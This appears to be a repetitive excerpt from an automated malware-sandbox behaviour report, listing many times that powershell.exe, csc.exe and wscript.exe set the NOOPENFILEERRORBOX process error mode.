                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
